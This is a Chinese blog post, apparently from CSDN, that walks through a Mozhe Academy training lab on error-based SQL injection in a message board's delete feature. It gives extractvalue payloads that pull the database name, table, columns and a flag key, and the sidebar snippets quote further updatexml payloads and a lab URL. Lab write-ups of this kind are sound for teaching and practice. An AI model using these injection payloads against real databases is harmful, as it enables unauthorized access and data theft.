SQL注入漏洞测试(delete注入)——<墨者学院漏洞记录>

最新推荐文章于 2024-03-11 16:57:56 发布
最新推荐文章于 2024-03-11 16:57:56 发布
阅读量381 收藏 1
点赞数
分类专栏: 漏洞/靶场操作记录 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chick11/article/details/118800439
版权

1、 打开链接界面,可以自行测试留言

2、 提交留言,查看网页源代码

3、在浏览器中自行添加后缀,并使用单引号测试注入点,发现存在报错行注入,报错型注入的方法大概有10种左右,这里分别使用floor、updatexml和extractvalue三种常用的方法。

4、 使用extractvalue注入方法获取当前数据库信息

注入语句:

and (extractvalue(1, concat(0x5c,(select database()))))

报错反馈得出数据库名称为pikaqiu

查询:select 字段名(uid,username,password) from 数据库名.数据表名;

查询指定字段的值:select * from  数据库名.数据表名 where 字段=><值(字符型的要用‘’)

5、 获取数据库中的表

注入语句:

and (extractvalue(1, concat(0x5c,(select table_name from information_schema.tables where table_schema='pikaqiu'))))

得出数据库表名为message

6、 获取表中的列信息

注入命令:

and (extractvalue(1, concat(0x5c,(select column_name from information_schema.columns where table_name='message' limit 3,1))))

调整limit第一位数字得到列:“id”“content”“key” "time“  可以变换为0,1,2,3

7、 获取key的值

andextractvalue(1,concat(0x5c,(SELECT concat_ws(':', `key`) FROM message limit 0,1)))

如果当前环境命令报错,就重新将靶机开启一次,感觉环境存在一些问题

Key的值:mozheceee2f22a023a3667f31edaaac

chick&
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
墨者SQL注入漏洞测试(delete注入)
wswr的博客
04-09 1869
总结:因为delete这个sql语句是没有回显的所以,要强制回显所以用报错注入,还有一个要注意的点就是可以用0x2a代替0x7e这样可以显示完整的32位会比再去用函数截取方便 思路:看网页源代码或者抓波都能发现注入点,一开始我用讲注入点标记为*用sqlmap去跑的时候,数据库和表和字段都出来了,但是为空,我猜因该是sqlmap一直试的过程删除了原本的字段,所以如果你用sqlmap跑过了就得重启靶场先,但是这里我们就已经得到了数据库 pikaqiu 表message 字段 key,所以直接用报错注入的在手动
墨者学院SQL注入漏洞测试(delete注入)
weixin_43884770的博客
12-04 1836
**背景介绍** 最近有人匿名给工程师留言说,感谢他的辛勤付出,把墨者学院建设的这么好,不料激发了工程师对留言板的一波操作,轻松查到了这个人的身份。 **实训目标** 1、熟练掌握留言板的工作原理; 2、善用burp抓取数据包; **解题方向** 抓取数据包加以分析。
SQL注入漏洞测试(delete注入)
qq_52718293的博客
12-09 2834
*首先关于报错型注入可以参考一下*文章了解 delecte注入的多种方法 这题我使用的是extractvalue函数 从此可以知道注入点在删除页面的url链接的id参数中,可由报错注入来爆库 1.爆库 (pikaqiu) http://219.153.49.228:48577/sqli_del.php?id=666 and extractvalue(1,concat(’~’,(select database()))) 2.爆表名(message) http://219.153.49.228:48577/
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
### 墨者靶场 Post、DB2、绕过登录及SQL注入四关攻略 #### 一、前言 在网络安全领域,靶场是检验安全技术能力的重要平台之一。本次攻略将详细介绍墨者靶场中的Post、DB2、绕过登录及SQL注入四个挑战关卡的解决方法...
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
墨者未必黑——思想汇报 .docx
02-10
墨者未必黑——思想汇报 .docx
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
0x36.SQL注入漏洞测试(delete注入)
qq_31679787的博客
12-10 275
抓包后发现存在id; 直接使用sqlmap进行爆数据; 得到key;
pikachu 漏洞平台sql注入delete注入
安全界的彭于晏的博客
06-26 973
delete 注入 一般在删除的界面 可能存在 我们看到靶场有一个留言板 点击删除抓个包试试 参数后面解payload 试一试 接着在后面爆表名字 or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1) or updatexml(1,concat(0x7e,subst
SQL SERVER 2008 高级注入 不支持单引号条件 显错模式
eldn__的专栏
12-02 2029
备注:显错模式 表个数 http://www.xxxxxx.xx/xx/oo.asp?id=10 and (select count(table_name) from sportstatz.information_schema.tables)=642 爆表 http://www.xxxxxx.xx/xx/oo.asp?id=(select top 1 table_name from
360众测靶场题库之61- SQL注入漏洞测试(delete注入)
zjl12344的博客
03-11 228
360众测靶场题库
SQL注入】UPDATE、insert、delete注入
07-08 3316
SQL注入
delete请求安全风险_Web漏洞|不安全的HTTP方法
weixin_39939530的博客
02-01 2839
我们常见的HTTP请求方法是GET、POST和HEAD。但是,其实除了这两个之外,HTTP还有一些其他的请求方法。WebDAV (Web-based Distributed Authoring and Versioning) 一种基于 HTTP 1.1协议的通信协议。它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使应用程序可对Web ...
SQL注入攻击介绍
热门推荐
99度灰的博客
03-30 2万+
SQL注入攻击介绍 一、SQL注入攻击简介 SQL注入攻击是指,后台数据库操作时,如果拼接外部参数到SQL语句中,就可能导致欺骗服务器执行恶意的SQL语句,造成数据泄露、删库、页面篡改等严重后果。按变量类型分为:数字型、字符型;按HTTP提交方式分为:GET注入、POST注入、Cookie注入;按注入方式分为:报错注入、盲注(布尔盲注、时间盲注)、堆叠注入等等。 二、SQL注入分类 按变量类型分类:如SQL语句为select *from user where param=1(数字型)、select *fr
SQL注入之insert/update/delete注入
情感博主V
02-15 3264
相关函数 UpdateXML(xml_target,xpath_expr,new_xml) #此函数将xml_target中用xpath_expr路径匹配到XML片段用new_xml替换,然后返回更改后的XML。 #xml_target被替换的部分与xpath_expr用户提供的XPath表达式匹配。 #如果找不到表达式匹配 xpath_expr项,或者找到多个匹配项,则该函数返回原始 ml_ta...
sql中“delete from 表名”表示_SQL注入——数据库增删改查语句
weixin_39939904的博客
11-16 6739
我们之前有讲过数据库是用来存储数据的,那么我们要如何才能从里面去查询到一些数据呢?如何才能把这些数据存储进去呢?那这就需要用到我们sql语句了。我们需要用这些语法去操作数据库。Sql,是一种特殊目的的编程语言,是一种数据库查询和程序设计语言,用于存取数据和查询,更新还有管理数据库,它分为三类:1、 DDL数据定义语言 create,drop2、 DML数据库操作语言 select insert u...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

chick&

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值